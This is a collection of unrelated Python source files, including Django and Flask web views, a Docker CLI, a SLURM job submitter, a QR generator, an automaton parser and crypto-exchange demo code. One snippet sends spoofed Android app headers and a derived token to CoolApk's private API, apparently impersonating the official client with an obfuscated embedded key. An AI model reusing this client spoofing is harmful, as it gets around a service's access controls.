if remove_value:
output.append(
_text_format_field('<removed>', fields[1], indent, remove_value))
else:
output.append(
_text_format_field(value, fields[1], indent, remove_value))
fields = fields[2:]
for field in fields:
if field.label == LABEL_REPEATED:
for value in getattr(msg, field.name):
output.append(_text_format_field(value, field, indent, remove_value))
else:
output.append(
_text_format_field(
getattr(msg, field.name), field, indent, remove_value))
return '\n'.join(output)
def text_format(msg: message.Message) -> str:
return _text_format_message(msg, '', False)
def assert_tink_proto_equal(self,
a: message.Message,
b: message.Message,
msg: Optional[str] = None) -> None:
"""Fails with a useful error if a and b aren't equal."""
self.assertMultiLineEqual(
_text_format_message(a, '', True),
_text_format_message(b, '', True),
msg=msg)
|
import pyqrcode
import validators
def createQR(url = 'https://www.github.com/Elry', qrName = 'author'):
url = pyqrcode.create(url)
url.svg(qrName+'.svg', scale = 8)
url.eps(qrName+'.eps', scale = 2)
print(url.terminal(quiet_zone = 1))
def getUrl():
print('Enter link to transform into QR code')
url = str(input())
while validators.url(url) != True:
print('Invalid url. E.g: https://www.google.com')
print('Enter link to transform into QR code')
url = str(input())
else:
createQR(url, 'customQR')
createQR()
getUrl() |
import os, sys, docker, json, shutil
class CLI(object):
def __init__(self, settings, debug, force):
self.settings = settings
self.debug = debug
self.force = force
self.options = {
"debug": self.debug,
"force": self.force,
}
self.client = docker.DockerClient(base_url="unix://var/run/docker.sock")
self.services = self.settings.get_service()
self.base_path = settings.get_path()
def parse_args(self, command, params):
#only run setup and install, others have yet to be implemented
if command == "setup":
method = getattr(self, command, None)()
elif command == "config":
method = getattr(self, command, None)(**params)
elif command == "variables":
self.parse_variables(**params)
elif command == "apps":
self.parse_apps(**params)
elif command in ["start", "restart", "stop", "update", "reset"]:
if len(params) > 0:
for i in params:
self.run_container(service=i, action=command)
else:
self.run_container(action=command)
def run_container(self, service=None, action=None):
from Docker import ContainerHandler
container = ContainerHandler(self.settings, self.client, self.options)
if service == None:
container.run(action)
else:
container.run_service(service, action)
def config(self, command, service, path=None, config=None, default=False):
from lib.config import Settings
if command in "get":
config = self.settings.get_config(service)
print(json.dumps(config, indent=2))
sys.exit(1)
try:
if not default:
if config == None:
config = json.load(open(path))
except IsADirectoryError:
print("The value you specified for '--config' is a directory. This value but be a JSON file")
except TypeError as e:
print("The config you specified is not valid JSON")
finally:
config_path = "%s/settings/%s.json" % (self.base_path, service)
default_path = "%s/settings/default-%s.json" % (self.base_path, service)
config_target = open(config_path, "w")
if not os.path.isfile(default_path):
default_target = open(default_path, "w+")
default_target.write(json.dumps(self.settings.get_config(service), indent=2))
default_target.close()
if not default:
config_target.write(json.dumps(config, indent=2))
else:
config = json.load(open(default_path))
config_target.write(json.dumps(config, indent=2))
config_target.close()
self.settings = Settings(path=self.base_path)
def parse_variables(self, command=None, variable=None, value=None, default=False):
config = self.settings.get_config("variables")
current_value = self.settings.get_variable(variable)
if current_value == None:
sys.exit(1)
if command == "get":
print(current_value)
sys.exit(1)
if not default:
if "," in value:
config[variable] = value.strip().split(",")
else:
config[variable] = value
self.config("set", "variables", config=config, default=default)
def parse_apps(self, command=None, app=None, default=False):
config = self.settings.get_config("variables")
apps = self.settings.get_variable("applications")
apps_path = self.settings.get_variable("apps-path")
apps_configs = self.settings.get_variable("applications-configs")
if len(apps) == 0 and command in ["list", "enable", "disable", "remove"]:
print("Currently not tracking any applications.\nPlease add an application if you'd like to run '%s'" % command)
sys.exit(1)
if app in apps and command == "add":
print("Application '%s' is currently already being tracked." % app)
sys.exit(1)
if command == "add":
if "," in app:
apps += app.strip().split(",")
else:
apps.append(app)
app_config, error = self.settings.find_app(app)
if error is not None:
if error == "json parse error":
print("Error parsing `app.json` for app `%s`" % app)
elif error == "app no config":
print("Application `%s` doesn't have a `app.json` file." % app)
elif error == "no app dir":
print("Application '%s' isn't a directory in `apps-path` (%s) variable." % (app, config['apps-path']))
sys.exit(1)
else:
# Relative paths used in app.json configs.
# Need to add those relative paths based on apps-path variable
app_config['frontend']['path'] = os.path.join(apps_path, app, app_config['frontend']['path'])
app_config['api']['path'] = os.path.join(apps_path, app, app_config['api']['path'])
app_config['app-dir-name'] = app
app_config['active'] = True
apps_configs.append(app_config)
self.parse_variables(command="set", variable="applications", value=apps)
self.parse_variables(command="set", variable="applications-configs", value=apps_configs)
print(",".join(apps))
elif command == "list":
print(",".join(current_value))
sys.exit(1)
elif command in ["enable", "disable"]:
new_apps_configs = []
for app_config in apps_configs:
if app_config['app-dir-name'] == app:
app_config['active'] = command == "enable"
new_apps_configs.append(app_config)
self.parse_variables(command="set", variable="applications-configs", value=new_apps_configs)
elif command == "remove":
if app not in apps:
print("Application requested '%s' to remove doesn't exist" % app)
else:
new_apps_configs = [i for i in apps_configs if i['app-dir-name'] != app]
new_apps = [i for i in apps if i != app]
self.parse_variables(command="set", variable="applications", value=new_apps)
self.parse_variables(command="set", variable="applications-configs", value=new_apps_configs)
def setup(self):
from tasks import build
build.run("mongodb", force=self.options['force'])
def tail(self, service, follow=False):
pass |
# -*- coding: utf-8 -*-
"""
This module is for running predictions.
Examples:
Example command line executable::
$ python predict.py
"""
import logging
from pathlib import Path
import click
import pandas as pd
from cloudpickle import load
from orbyter_demo.util.config import parse_config
from orbyter_demo.util.logging import setup_logging
logger = logging.getLogger(__name__)
@click.command()
@click.argument("config_file", type=str, default="/mnt/configs/config.yml")
def predict(config_file):
"""
Main function runs predictions.
Args:
None
Returns:
None
"""
config = parse_config(config_file)
# Load model
logger.info(f"Loading model from {config['predict']['model_path']}.")
model_path = Path(config["predict"]["model_path"])
with open(model_path, "rb") as f:
trained_model = load(f)
# Load data
logger.info(f"Loading input data from {config['predict']['data_path']}.")
data_path = Path(config["predict"]["data_path"])
X = pd.read_parquet(data_path)
# Make predictions and persist
logger.info(
f"Make predictions and persist to {config['predict']['predictions_path']}."
)
yhat = trained_model.predict(X)
yhat = pd.DataFrame(yhat, columns=["MedianHouseValue"])
pred_path = Path(config["predict"]["predictions_path"])
pred_path.parent.mkdir(parents=True, exist_ok=True)
yhat.to_parquet(pred_path)
if __name__ == "__main__":
setup_logging()
predict()
|
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.db.models import Q
from django.shortcuts import get_object_or_404, redirect
from django.utils.translation import ugettext_lazy as _
from django.views.generic import ListView, DetailView
from django.views.generic.detail import SingleObjectMixin
from django.views.generic.edit import FormMixin, CreateView, UpdateView
from .models import Post
from .forms import PostForm, CommentForm
from category.models import Category
class PostListView(ListView):
model = Post
template_name = 'blog/index.html'
extra_context = {'title': _('Posts')}
paginate_by = 5
page_kwarg = 'page'
def get_queryset(self):
posts = Post.objects.all()
query = self.request.GET.get('q', None)
if query:
posts = posts.filter(Q(title__icontains=query) | Q(content__icontains=query)).distinct()
return posts
def get_context_data(self, *args, **kwargs):
data = super().get_context_data(*args, **kwargs)
data['categories'] = Category.objects.filter(type='post')
return data
class PostDetailView(SuccessMessageMixin, FormMixin, DetailView):
model = Post
template_name = 'blog/detail.html'
form_class = CommentForm
success_message = _('Comment is created successfully!')
def get_object(self, queryset=None):
return get_object_or_404(Post, slug=self.kwargs['slug'])
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['title'] = self.object.title
data['meta_description'] = self.object.meta_description
return data
def get_success_url(self):
return self.object.get_absolute_url()
def post(self, request, *args, **kwargs):
# Get object
self.object = self.get_object()
# Form actions
form = self.get_form()
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
def form_valid(self, form):
comment = form.save(commit=False)
comment.post = self.object
comment.save()
return super().form_valid(form)
class PostCreateView(LoginRequiredMixin, SuccessMessageMixin, CreateView):
model = Post
template_name = 'blog/form.html'
extra_context = {'title': _('Create Post')}
form_class = PostForm
success_message = _('Post created successfully')
def get_success_url(self):
return self.object.get_absolute_url()
def form_valid(self, form):
post = form.save(commit=False)
post.user = self.request.user
post.save()
return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = Post
template_name = 'blog/form.html'
extra_context = {'title': _('Create Post')}
form_class = PostForm
success_message = _('Post updated successfully!')
def get_object(self, queryset=None):
return get_object_or_404(Post, pk=self.kwargs['id'])
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['title'] = '{}: {}'.format(_('Update'), self.object.title)
return data
def get_success_url(self):
return self.object.get_absolute_url()
@login_required
def post_delete(request, id):
# Get post
post = get_object_or_404(Post, id=id)
# Security control
if request.user.is_superuser or post.user == request.user:
post.delete()
return redirect('blog:index')
else:
return redirect('blog:index')
class CategoryDetailView(SingleObjectMixin, ListView):
model = Post
template_name = 'blog/category.html'
paginate_by = 5
def get_object(self, queryset=None):
return get_object_or_404(Category, pk=self.kwargs['id'], slug=self.kwargs['slug'], type='post')
def get(self, request, *args, **kwargs):
self.object = self.get_object()
return super().get(request, *args, **kwargs)
def get_queryset(self):
return Post.objects.filter(category=self.object)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['title'] = self.object.name
data['meta_description'] = self.object.meta_description
data['categories'] = Category.objects.all()
return data
|
from flask import Blueprint, render_template, request, flash, jsonify, session
from flask_login import login_required, current_user
from .models import Movie
from . import db, app_title
import json
from sqlalchemy.sql import func, or_, desc
from time import time_ns
# Create a Flask blueprint, attach this module to it
views = Blueprint( 'views', __name__ )
def get_movies_from_db() :
"""
Fetches movies from the database
Used by other functions in this module
Creates a sorted and filtered list of movies
sorted on current session variable sort_key
filtered on current session variable search_term
:return: An object of type list
"""
search_result = []
match session[ 'sort_key' ] :
case 'title' :
# Get data from db, search in title and genre
search_result = Movie.query.filter(
Movie.user_id == current_user.id,
or_(
func.lower( Movie.title ).contains( session[ 'search_term' ] ),
func.lower( Movie.genre ).contains( session[ 'search_term' ] )
)
).order_by( Movie.title ) # Sort on title
case 'title_reverse' :
# Get data from db, search in title and genre
search_result = Movie.query.filter(
Movie.user_id == current_user.id,
or_(
func.lower( Movie.title ).contains( session[ 'search_term' ] ),
func.lower( Movie.genre ).contains( session[ 'search_term' ] )
)
).order_by( desc( Movie.title ) ) # Sort on title, reversed
case 'genre' :
# Get data from db, search in title and genre
search_result = Movie.query.filter(
Movie.user_id == current_user.id,
or_(
func.lower( Movie.title ).contains( session[ 'search_term' ] ),
func.lower( Movie.genre ).contains( session[ 'search_term' ] )
)
).order_by( Movie.genre ) # Sort on genre
case 'genre_reverse' :
# Get data from db, search in title and genre
search_result = Movie.query.filter(
Movie.user_id == current_user.id,
or_(
func.lower( Movie.title ).contains( session[ 'search_term' ] ),
func.lower( Movie.genre ).contains( session[ 'search_term' ] )
)
).order_by( desc( Movie.genre ) ) # Sort on genre, reversed
case 'length' :
# Get data from db, search in title and genre
search_result = Movie.query.filter(
Movie.user_id == current_user.id,
or_(
func.lower( Movie.title ).contains( session[ 'search_term' ] ),
func.lower( Movie.genre ).contains( session[ 'search_term' ] )
)
).order_by( Movie.length ) # Sort on length
case 'length_reverse' :
# Get data from db, search in title and genre
search_result = Movie.query.filter(
Movie.user_id == current_user.id,
or_(
func.lower( Movie.title ).contains( session[ 'search_term' ] ),
func.lower( Movie.genre ).contains( session[ 'search_term' ] )
)
).order_by( desc( Movie.length ) ) # Sort on length, reversed
case _ :
# Get data from db, search in title and genre, sort on position
search_result = Movie.query.filter(
Movie.user_id == current_user.id,
or_(
func.lower( Movie.title ).contains( session[ 'search_term' ] ),
func.lower( Movie.genre ).contains( session[ 'search_term' ] )
)
).order_by( Movie.position )
return search_result
@views.post( '/' )
@login_required
def home_post() :
"""
Reads form data that was sent from the webpage
Validates movie title length that was sent in the form
Registers the movie in the database
:return: The home page
"""
# Get form data
form_title = request.form.get( 'movie_title' )
form_img_url = request.form.get( 'movie_img' )
form_genre = request.form.get( 'movie_genre' )
form_length = request.form.get( 'movie_length' )
# See if form data is valid
if len( form_title ) < 1 :
flash( 'Title is too short!', category = 'error' )
else :
# Attempt was successful
# Create new movie object
new_movie = Movie( title = form_title, img_src = form_img_url, genre = form_genre, length = form_length, user_id = current_user.id )
# Register the movie in the database
current_user.movies.append( new_movie )
current_user.movies.reorder()
db.session.commit()
flash( 'Movie was added!', category = 'success' )
# Show the home page
return home_get()
@views.get( '/' )
@login_required
def home_get() :
"""
Shows the home page
Initializes a few session vars
:return: The home HTML page using a Flask template
"""
# Init missing session variables that are used to sort or search movies
if not 'search_term' in session : session[ 'search_term' ] = ''
if not 'sort_key' in session : session[ 'sort_key' ] = ''
if not 'sortbtn_title_reverse' in session : session[ 'sortbtn_title_reverse' ] = False
if not 'sortbtn_genre_reverse' in session : session[ 'sortbtn_genre_reverse' ] = False
if not 'sortbtn_length_reverse' in session : session[ 'sortbtn_length_reverse' ] = False
# Populate list with movies with default sorting
search_result = get_movies_from_db()
# Log some info
print( f'current_user: [{current_user}]' )
sep = ''
for m in current_user.movies : print( f'{sep}(p:{m.position} t:{m.title} i:{m.id})', end='' ); sep = ', '
print( '' )
# Return the page
return render_template( 'home.html', app_title = app_title, user = current_user, search_result = search_result, sort_key = session[ 'sort_key' ], time = time_ns() )
@views.post( '/delete-movie' )
@login_required
def delete_movie() :
"""
This function removes the movie with a matching id
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
# Was the movie found?
if movie :
if movie.user_id == current_user.id :
#db.session.delete( movie )
current_user.movies.remove( movie )
current_user.movies.reorder()
# Register the change in the database
db.session.commit()
# Must return something, return empty JSON
return jsonify( {} )
@views.post( '/done-movie' )
@login_required
def done_movie() :
"""
Marks the movie with a matching id as watched
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
movie_done = req_movie[ 'done' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
# Was the movie found?
if movie and movie.user_id == current_user.id:
movie.done = movie_done
# Register the change in the database
db.session.commit()
# Must return something, return empty JSON
return jsonify( { } )
@views.post( '/update-movie-title' )
@login_required
def update_movie_title() :
"""
This function updates the title for a movie with a matching id
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
movie_title = req_movie[ 'title' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
# Was the movie found?
if movie and movie.user_id == current_user.id:
movie.title = movie_title
# Register the change in the database
db.session.commit()
# Must return something, return empty JSON
return jsonify( { } )
@views.post( '/update-movie-genre' )
@login_required
def update_movie_genre() :
"""
This function updates the genre for a movie with a matching id
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
movie_genre = req_movie[ 'genre' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
# Was the movie found?
if movie and movie.user_id == current_user.id:
movie.genre = movie_genre
# Register the change in the database
db.session.commit()
# Must return something, return empty JSON
return jsonify( { } )
@views.post( '/update-movie-length' )
@login_required
def update_movie_length() :
"""
Updates the length for a movie with a matching id
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
movie_length = req_movie[ 'length' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
# Was the movie found?
if movie and movie.user_id == current_user.id:
movie.length = movie_length
# Register the change in the database
db.session.commit()
# Must return something, return empty JSON
return jsonify( { } )
@views.post( '/update-poster' )
@login_required
def update_movie_poster() :
"""
This function updates the poster image url for a movie with a matching id
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
movie_poster_url = req_movie[ 'poster_url' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
if movie and movie.user_id == current_user.id:
movie.img_src = movie_poster_url
db.session.commit()
# Must return something, return empty JSON
return jsonify( { } )
@views.get( '/search' )
@login_required
def search_get() :
"""
This is used for searching movies on title or genre
:return: HTML list elements containing the movies
"""
# Get form data
search_term = request.args.get( 'q' )
if search_term : session[ 'search_term' ] = search_term
else : session[ 'search_term' ] = ''
# Log some info
print( f'session sort_key: [{session[ "sort_key" ]}]' )
print( f'session search_term: [{session[ "search_term" ]}]' )
search_result = get_movies_from_db()
return render_template( 'movies.html', search_result = search_result, query = search_term, sort_key = session[ 'sort_key' ] )
@views.post( '/arrange' )
@login_required
def arrange_post() :
"""
Used for rearranging the movies in the list
Reads JSON data that was sent
"""
# Get JSON data that was sent
json_data = json.loads( request.data )
movie_id = json_data.get( 'id' )
movie_placement = json_data.get( 'placement' )
# Find the movie in db
qm = Movie.query.get( movie_id )
# Make sure the placement is valid
alts = [ 'first', 'up', 'down', 'last' ]
if qm and movie_placement in alts :
# Log some info
print( f'p:{qm.position} t:{qm.title} i:{qm.id} where:[{movie_placement}]' )
# Remove movie from list
movie = current_user.movies.pop( qm.position )
new_position = qm.position
match movie_placement :
case 'first' :
current_user.movies.insert( 0, movie )
case 'up' :
new_position -= 1
if new_position <= 0 : new_position = 0
current_user.movies.insert( new_position, movie )
case 'down' :
new_position += 1
current_user.movies.insert( new_position, movie )
case 'last' :
current_user.movies.append( movie )
case _ :
print( 'Not allowed!' )
current_user.movies.reorder()
db.session.commit()
return render_template( 'movies.html', search_result = current_user.movies )
@views.get( '/sort' )
@login_required
def sort_get() :
"""
Used for sorting
Takes a query parameter that is used as a sort key
:return: A key-sorted list of HTML LI elements containing the movies
"""
# Save current session sort key
old_session_key = session[ 'sort_key' ]
# Get query vars
received_key = request.args.get( 'key' )
# Log some info
print( f'received key from ui: [{received_key}], old session key: [{old_session_key}]' )
# Set the sort key to a sane state
if not received_key : received_key = ''
# Reverse the sorting order only if the user requested same sort key a second time in a row
new_session_key = received_key
if received_key == 'title' : # Assuming that the user has clicked on the sort button "Title"
if 'title' in old_session_key : # Same button was clicked twise in a row, change the state
if session[ 'sortbtn_title_reverse' ] :
session[ 'sortbtn_title_reverse' ] = False
new_session_key = 'title'
else :
session[ 'sortbtn_title_reverse' ] = True
new_session_key = 'title_reverse'
else : # Different button was clicked than before, keep same state
if session[ 'sortbtn_title_reverse' ] :
new_session_key = 'title_reverse'
else :
new_session_key = 'title'
if received_key == 'genre' :
if 'genre' in old_session_key : # Same button was clicked twise in a row, change the state
if session[ 'sortbtn_genre_reverse' ] :
session[ 'sortbtn_genre_reverse' ] = False
new_session_key = 'genre'
else :
session[ 'sortbtn_genre_reverse' ] = True
new_session_key = 'genre_reverse'
else : # Different button was clicked than before, keep same state
if session[ 'sortbtn_genre_reverse' ] :
new_session_key = 'genre_reverse'
else :
new_session_key = 'genre'
if received_key == 'length' :
if 'length' in old_session_key : # Same button was clicked twise in a row, change the state
if session[ 'sortbtn_length_reverse' ] :
session[ 'sortbtn_length_reverse' ] = False
new_session_key = 'length'
else :
session[ 'sortbtn_length_reverse' ] = True
new_session_key = 'length_reverse'
else : # Different button was clicked than before, keep same state
if session[ 'sortbtn_length_reverse' ] :
new_session_key = 'length_reverse'
else :
new_session_key = 'length'
# Log some info
print( f'current key: [{new_session_key}]' )
# Set session variable sort_key which is used to sort the list
session[ 'sort_key' ] = new_session_key
search_result = get_movies_from_db()
# Return the movies page
return render_template( 'movies.html', search_result = search_result, query = new_session_key, sort_key = new_session_key )
@views.get( '/ui/sort-buttons' )
@login_required
def sortbtns_get() :
"""
Used for rendering of sort buttons in GUI
:return: HTML code describing the sort buttons
"""
# Create default button states
sort_buttons = []
sort_buttons.append( { 'btn_id' : 'btn_sort_off', 'btn_class' : 'btn-outline-success', 'label': 'Sort:Off', 'sort_key': '', 'reverse' : False } )
sort_buttons.append( { 'btn_id' : 'btn_sort_title', 'btn_class' : 'btn-outline-success', 'label': 'Title', 'sort_key': 'title', 'reverse' : session[ 'sortbtn_title_reverse' ] } )
sort_buttons.append( { 'btn_id' : 'btn_sort_genre', 'btn_class' : 'btn-outline-success', 'label': 'Genre', 'sort_key': 'genre', 'reverse' : session[ 'sortbtn_genre_reverse' ] } )
sort_buttons.append( { 'btn_id' : 'btn_sort_length', 'btn_class' : 'btn-outline-success', 'label': 'Length', 'sort_key': 'length', 'reverse' : session[ 'sortbtn_length_reverse' ] } )
# Modify states of the sort buttons depending on the current session var sort_key
# This changes the jinja variable used for rendering the html page for sort buttons
match session[ 'sort_key' ].removesuffix( '_reverse' ) :
case '' : sort_buttons[ 0 ][ 'btn_class' ] = 'btn-success'
case 'title' : sort_buttons[ 1 ][ 'btn_class' ] = 'btn-success'
case 'genre' : sort_buttons[ 2 ][ 'btn_class' ] = 'btn-success'
case 'length' : sort_buttons[ 3 ][ 'btn_class' ] = 'btn-success'
# Return the buttons page
return render_template( 'sortbtns.html', sort_key = session[ 'sort_key' ], sort_buttons = sort_buttons, time = time_ns() )
|
# Generated by Django 3.0.10 on 2020-11-09 15:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cms', '0068_bibliography_surname'),
]
operations = [
migrations.RenameField(
model_name='bibliographyentry',
old_name='author_firstame',
new_name='author_firstname',
),
]
|
from src.Transition import *
class Graph(object):
"""Clase d'un graphe/automate
Traite un fichier.txt et retourne l'alphabet, l'état initial, états finaux,
alphabet, les états et transitions
Attributes:
transitions (list): Liste des transitions de type 'Transition'
finalStates (list): Liste des états finaux (str)
alphabet (list): L'alphabet du langage
states (list): Liste des états de l'automate (str)
initialState (str): Etat initial de l'automate
"""
def __init__(self, file=None):
"""Constructeur de la classe du graphe
Le constructeur initialise tout les paramètres du graphe à
des valeurs vides, sauf le fichier s'il est donné en paramètre.
Args:
file (file): Fichier txt contenant le graphe
"""
if (file):
self.file = file
self.transitions = [] # transitions
self.finalStates = [] # états finaux
self.alphabet = [] # alphabet
self.states = [] # états
self.initialState = '' # état initial
def parse(self):
"""Fonction de traitement d'un fichier txt
La fonction lis le fichier txt contenant le graphe
et génère un objet de type Graph, donc un automate.
"""
counter = 0
if self.file != None:
for line in self.file:
# la première ligne contient les états finaux
if (counter == 0):
# les stocker
self.finalStates = line.rstrip().split(' ')
# reste du fichier = transitions
# Premier élément de la première ligne = état initial
# A chaque ligne ajouter l'état et élément de l'alphabet s'ils n'existent pas déjà
elif (counter == 1):
self.initialState = line.rstrip().split(' ')[0]
line = line.rstrip().split(' ')
self.states.append(line[0])
if (line[0] != line[2]):
self.states.append(line[2])
self.transitions.append(
Transition(line[0], line[1], line[2]))
if (line[1] not in self.alphabet):
self.alphabet.append(line[1])
else:
line = line.rstrip().split(' ')
if (line[0] not in self.states):
self.states.append(line[0])
if (line[2] not in self.states):
self.states.append(line[2])
self.transitions.append(
Transition(line[0], line[1], line[2]))
if (line[1] not in self.alphabet):
self.alphabet.append(line[1])
counter += 1
self.close()
def getStateTransitions(self, state):
"""Récupérer toutes les transitions possibles d'un noeud (state)
Fonction qui prend un état, et récupère toutes les transitions possible
depuis ce dernier.
Args:
state (str): Etat de départ
Returns:
list: Liste des transitions possibles
"""
transFromState = []
for node in self.gettransitions():
if (node.mFrom == state):
transFromState.append(node)
return transFromState
# Récupérer toutes les transitions possibles d'un noeud (state) en lisant la lettre (letter)
def getStateTransitionsLetter(self, state, letter):
"""Récupérer toutes les transitions possibles d'un noeud en lisant une lettre
Fonction qui prend un état et une lettre de l'alphabet,
et récupère toutes les transitions possible en lisant cette lettre
depuis ce dernier.
Args:
state (str): Etat de départ
letter (str): Lettre de l'alphabet
Returns:
list: Liste des transitions possibles
"""
transFromState = []
for node in self.gettransitions():
if (node.mFrom == state and node.mValue == letter):
transFromState.append(node)
return transFromState
def nodeToString(self, node):
"""Fonction pour afficher un noeud en chaine de caractère
Args:
node (Transition): Un noeud (départ, lettre, arrivé)
Returns:
str: Le noeud sous forme de chaine de caractères
"""
return f"Read {node.mValue} from {node.mFrom} to {node.mGoto}"
def close(self):
# Fermer le fichier à la fin
self.file.close()
# getters
def getAlphabet(self):
return self.alphabet
def getFinalStates(self):
return self.finalStates
def gettransitions(self):
return self.transitions
def getStates(self):
return self.states
def getInitialState(self):
return self.initialState
# setters
def setAlphabet(self, alphabet):
self.alphabet = alphabet
def setFinalStates(self, final_states):
self.finalStates = final_states
def settransitions(self, nodes):
self.transitions = nodes
def setStates(self, states):
self.states = states
def setInitialState(self, initialState):
self.initialState = initialState
|
from subprocess import Popen, PIPE
import sys, time
import getpass
username = getpass.getuser()
#from Axel Schmidt
def file_len(f):
for i, l in enumerate(f):
pass
return i + 1
for i in range(0, 1):
command= """#!/bin/bash
#SBATCH --job-name=clas12-nflow{0}
#SBATCH --nodes=1
#SBATCH --ntasks=1
#SBATCH --cpus-per-task=1
#SBATCH --gres=gpu:1
#SBATCH --mem=4G
#SBATCH --time=04:00:00
#SBATCH --nodelist=node235
#SBATCH --partition=sched_mit_hill
#SBATCH --error=/pool001/{1}/clas12-nflows/slurm/logs/log_{0}.err
#SBATCH --output=/pool001/{1}/clas12-nflows/slurm/logs/log_{0}.out
#SBATCH --mail-user={1}@mit.edu
#SBATCH --mail-type=ALL
eval "$(conda shell.bash hook)"
conda activate torch-env
python train_nflow.py
""".format(str(i), username)
queue=Popen(args=["squeue","-u",username],stdin=None,stdout=PIPE)
linecount = file_len(queue.stdout)-1
print("There are ", linecount, "jobs on the queue.")
# If we have too many things on the queue, then wait a minute
while (linecount > 499):
print("There are still", linecount, "jobs on the queue. Waiting...")
sys.stdout.flush()
time.sleep(60)
queue=Popen(args=["squeue","-u",username],stdin=None,stdout=PIPE)
linecount = file_len(queue.stdout)
p=Popen(args=["sbatch"],stdin=PIPE);
p.communicate(bytes(command, encoding='utf-8'))
|
import logging
import os
import uuid
from cryptoxlib.CryptoXLib import CryptoXLib
from cryptoxlib.Pair import Pair
from cryptoxlib.clients.hitbtc.HitbtcWebsocket import TickerSubscription, OrderbookSubscription, TradesSubscription, \
AccountSubscription, ClientWebsocketHandle, CreateOrderMessage, CancelOrderMessage
from cryptoxlib.clients.hitbtc import enums
from cryptoxlib.version_conversions import async_run
LOG = logging.getLogger("cryptoxlib")
LOG.setLevel(logging.DEBUG)
LOG.addHandler(logging.StreamHandler())
print(f"Available loggers: {[name for name in logging.root.manager.loggerDict]}\n")
async def order_book_update(response: dict) -> None:
print(f"Callback order_book_update: [{response}]")
async def ticker_update(response: dict) -> None:
print(f"Callback ticker_update: [{response}]")
async def trade_update(response: dict) -> None:
print(f"Callback trade_update: [{response}]")
async def account_update(response: dict, websocket: ClientWebsocketHandle) -> None:
print(f"Callback account_update: [{response}]")
# as soon as account channel subscription is confirmed, fire testing orders
if 'id' in response and 'result' in response and response['result'] == True:
await websocket.send(CreateOrderMessage(
pair = Pair('ETH', 'BTC'),
type = enums.OrderType.LIMIT,
side = enums.OrderSide.BUY,
amount = "1000000000",
price = "0.000001",
client_id = str(uuid.uuid4())[:32]
))
await websocket.send(CancelOrderMessage(
client_id = "client_id"
))
async def run():
api_key = os.environ['HITBTCAPIKEY']
sec_key = os.environ['HITBTCSECKEY']
client = CryptoXLib.create_hitbtc_client(api_key, sec_key)
# Bundle several subscriptions into a single websocket
client.compose_subscriptions([
AccountSubscription(callbacks = [account_update]),
OrderbookSubscription(pair = Pair("ETH", "BTC"), callbacks = [order_book_update]),
TickerSubscription(pair = Pair("BTC", "USD"), callbacks = [ticker_update])
])
# Bundle another subscriptions into a separate websocket
client.compose_subscriptions([
TradesSubscription(pair = Pair("ETH", "BTC"), limit = 5,callbacks = [trade_update])
])
# Execute all websockets asynchronously
await client.start_websockets()
if __name__ == "__main__":
async_run(run())
|
import base64
import json
import urllib.request
from _md5 import md5
api = "https://api.coolapk.com/v6/main/init"
built_in_str = "ldTM3cTZiFTMhFzMlFWN2cjMjVDNzQWYxYTOwU2MwIDZHljcadFN2wUe5omYyATdZJTO2J2RGdXY5VDdZhlSypFWRZXW6l1MadVWx8EVRpnT6dGMaRUQ14keVdnWH5UbZ1WS61EVBlXTHl1dZdVSvcDZzI2YmVWMjF2NwAjZkN2YmVTY4UTO1YWO4Y2NwQGO"
device_id = "00000000-0000-0000-0000-000000000000"
package_name = "com.coolapk.market"
def base64_encode(data):
return base64.b64encode(data.encode()).decode()
def base64_decode(data):
return base64.b64decode(data.encode()).decode()
def reverse_str(s):
return s[::-1]
def md5_hex_digest(data):
m = md5()
m.update(data.encode())
return m.hexdigest()
def test_token(token: str):
opener = urllib.request.build_opener()
opener.addheaders.clear()
opener.addheaders.append(("User-Agent", "Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H) (#Build; Android-x86; VirtualBox; android_x86-userdebug 7.1.2 N2G48H eng.cwhuan.20180502.160334 test-keys; 7.1.2) +CoolMarket/9.0.2"))
opener.addheaders.append(("X-Requested-With", "XMLHttpRequest"))
opener.addheaders.append(("X-Sdk-Int", "25"))
opener.addheaders.append(("X-Sdk-Locale", "zh-CN"))
opener.addheaders.append(("X-App-Id", "com.coolapk.market"))
opener.addheaders.append(("X-App-Version", "9.0.2"))
opener.addheaders.append(("X-App-Code", "1902151"))
opener.addheaders.append(("X-App-Version", "9"))
opener.addheaders.append(("X-App-Token", token))
response = opener.open(api).read().decode()
print(json.dumps(json.loads(response), indent=2, ensure_ascii=False))
|
# -*- coding: utf-8 -*-
import tushare as ts
from sqlalchemy import create_engine
from utilAll.Constants import *
from utilAll.FormatDate import *
import pandas as pd
class ReferenceInfo:
